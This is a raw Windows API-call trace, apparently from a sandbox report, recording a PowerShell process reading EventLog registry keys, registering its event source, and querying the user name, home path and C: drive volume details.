	[0837.690] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.690] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x354) returned 0x0
	[0837.690] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.690] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x358) returned 0x0
	[0837.690] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.691] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x35c) returned 0x0
	[0837.691] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.691] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x360) returned 0x0
	[0837.691] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x364) returned 0x0
	[0837.691] RegCloseKey (hKey=0x364) returned 0x0
	[0837.691] RegCloseKey (hKey=0x33c) returned 0x0
	[0837.692] RegCloseKey (hKey=0x360) returned 0x0
	[0837.692] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d408 | out: phkResult=0x24d408*=0x360) returned 0x0
	[0837.692] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d37c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.693] CoTaskMemFree (pv=0x0) 
	[0837.693] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.693] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.693] CoTaskMemFree (pv=0x129840) 
	[0837.693] CoTaskMemFree (pv=0x0) 
	[0837.693] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.693] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.693] CoTaskMemFree (pv=0x129840) 
	[0837.693] CoTaskMemFree (pv=0x0) 
	[0837.693] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.693] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.693] CoTaskMemFree (pv=0x129840) 
	[0837.693] CoTaskMemFree (pv=0x0) 
	[0837.693] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.693] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.694] CoTaskMemFree (pv=0x129840) 
	[0837.694] CoTaskMemFree (pv=0x0) 
	[0837.694] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.694] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.694] CoTaskMemFree (pv=0x129840) 
	[0837.694] CoTaskMemFree (pv=0x0) 
	[0837.694] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.694] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.694] CoTaskMemFree (pv=0x129840) 
	[0837.694] CoTaskMemFree (pv=0x0) 
	[0837.694] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.694] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.694] CoTaskMemFree (pv=0x129840) 
	[0837.694] CoTaskMemFree (pv=0x0) 
	[0837.695] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.695] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.695] CoTaskMemFree (pv=0x129840) 
	[0837.695] CoTaskMemFree (pv=0x0) 
	[0837.695] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.695] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.695] CoTaskMemFree (pv=0x129840) 
	[0837.695] CoTaskMemFree (pv=0x0) 
	[0837.695] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x33c) returned 0x0
	[0837.695] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.695] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x364) returned 0x0
	[0837.696] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.696] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x368) returned 0x0
	[0837.696] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.696] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x36c) returned 0x0
	[0837.696] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.696] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x370) returned 0x0
	[0837.696] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.696] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x374) returned 0x0
	[0837.697] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.697] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x378) returned 0x0
	[0837.697] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.697] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x37c) returned 0x0
	[0837.697] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.697] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x380) returned 0x0
	[0837.697] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x384) returned 0x0
	[0837.697] RegCloseKey (hKey=0x384) returned 0x0
	[0837.698] RegCloseKey (hKey=0x360) returned 0x0
	[0837.698] RegCloseKey (hKey=0x380) returned 0x0
	[0837.699] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d3d8 | out: phkResult=0x24d3d8*=0x380) returned 0x0
	[0837.699] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d34c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d348, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d34c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d348*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.699] CoTaskMemFree (pv=0x0) 
	[0837.699] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.699] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.699] CoTaskMemFree (pv=0x129840) 
	[0837.699] CoTaskMemFree (pv=0x0) 
	[0837.699] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.699] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.700] CoTaskMemFree (pv=0x129840) 
	[0837.700] CoTaskMemFree (pv=0x0) 
	[0837.700] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.700] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.700] CoTaskMemFree (pv=0x129840) 
	[0837.700] CoTaskMemFree (pv=0x0) 
	[0837.700] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.700] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.700] CoTaskMemFree (pv=0x129840) 
	[0837.700] CoTaskMemFree (pv=0x0) 
	[0837.700] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.700] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.700] CoTaskMemFree (pv=0x129840) 
	[0837.700] CoTaskMemFree (pv=0x0) 
	[0837.700] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.700] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.701] CoTaskMemFree (pv=0x129840) 
	[0837.701] CoTaskMemFree (pv=0x0) 
	[0837.701] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.701] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.701] CoTaskMemFree (pv=0x129840) 
	[0837.701] CoTaskMemFree (pv=0x0) 
	[0837.701] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.701] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.701] CoTaskMemFree (pv=0x129840) 
	[0837.701] CoTaskMemFree (pv=0x0) 
	[0837.701] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.701] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x129840, lpcchName=0x24d3d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d3d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.701] CoTaskMemFree (pv=0x129840) 
	[0837.701] CoTaskMemFree (pv=0x0) 
	[0837.701] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x360) returned 0x0
	[0837.702] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.702] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x384) returned 0x0
	[0837.702] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.702] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x388) returned 0x0
	[0837.702] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.702] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x38c) returned 0x0
	[0837.702] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.702] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x390) returned 0x0
	[0837.702] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.703] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x394) returned 0x0
	[0837.703] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.703] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x398) returned 0x0
	[0837.703] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.703] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x39c) returned 0x0
	[0837.703] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x0) returned 0x2
	[0837.704] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3a0) returned 0x0
	[0837.704] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d438 | out: phkResult=0x24d438*=0x3a4) returned 0x0
	[0837.704] RegCloseKey (hKey=0x3a4) returned 0x0
	[0837.704] RegCloseKey (hKey=0x380) returned 0x0
	[0837.704] RegCloseKey (hKey=0x3a0) returned 0x0
	[0837.709] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x27d0008
	[0839.456] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3002568*="WSMan", lpRawData=0x30022d8) returned 1
	[0839.461] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.461] CoTaskMemFree (pv=0x181480) 
	[0839.463] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0839.463] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0839.463] CoTaskMemFree (pv=0x1b807960) 
	[0839.463] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0839.463] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0839.464] CoTaskMemFree (pv=0x129840) 
	[0839.464] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3007aa0*="Alias", lpRawData=0x3007830) returned 1
	[0839.478] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.478] CoTaskMemFree (pv=0x181480) 
	[0839.479] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0839.479] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0839.480] CoTaskMemFree (pv=0x1b807960) 
	[0839.480] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0839.480] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0839.480] CoTaskMemFree (pv=0x129840) 
	[0839.480] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x300d098*="Environment", lpRawData=0x300ce28) returned 1
	[0839.489] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.489] CoTaskMemFree (pv=0x181480) 
	[0839.489] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.490] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0839.490] CoTaskMemFree (pv=0x181480) 
	[0839.490] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.490] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0839.490] CoTaskMemFree (pv=0x181480) 
	[0839.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24d270, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0839.490] SetErrorMode (uMode=0x1) returned 0x1
	[0839.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d480 | out: lpFileInformation=0x24d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.490] SetErrorMode (uMode=0x1) returned 0x1
	[0839.492] GetLogicalDrives () returned 0x4
	[0839.492] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.493] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.493] SetErrorMode (uMode=0x1) returned 0x1
	[0839.494] CoTaskMemAlloc (cb=0x68) returned 0x1b7f8bc0
	[0839.494] CoTaskMemAlloc (cb=0x68) returned 0x1b7f8a00
	[0839.494] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7f8bc0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d450, lpMaximumComponentLength=0x24d44c, lpFileSystemFlags=0x24d448, lpFileSystemNameBuffer=0x1b7f8a00, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d450*=0x9c354b42, lpMaximumComponentLength=0x24d44c*=0xff, lpFileSystemFlags=0x24d448*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0839.495] CoTaskMemFree (pv=0x1b7f8bc0) 
	[0839.495] CoTaskMemFree (pv=0x1b7f8a00) 
	[0839.495] SetErrorMode (uMode=0x1) returned 0x1
	[0839.495] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.495] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.495] SetErrorMode (uMode=0x1) returned 0x1
	[0839.495] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d3f0 | out: lpFileInformation=0x24d3f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.495] SetErrorMode (uMode=0x1) returned 0x1
	[0839.495] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.496] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.496] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.496] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.496] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.496] SetErrorMode (uMode=0x1) returned 0x1
	[0839.496] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d220 | out: lpFileInformation=0x24d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.497] SetErrorMode (uMode=0x1) returned 0x1
	[0839.497] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.497] SetErrorMode (uMode=0x1) returned 0x1
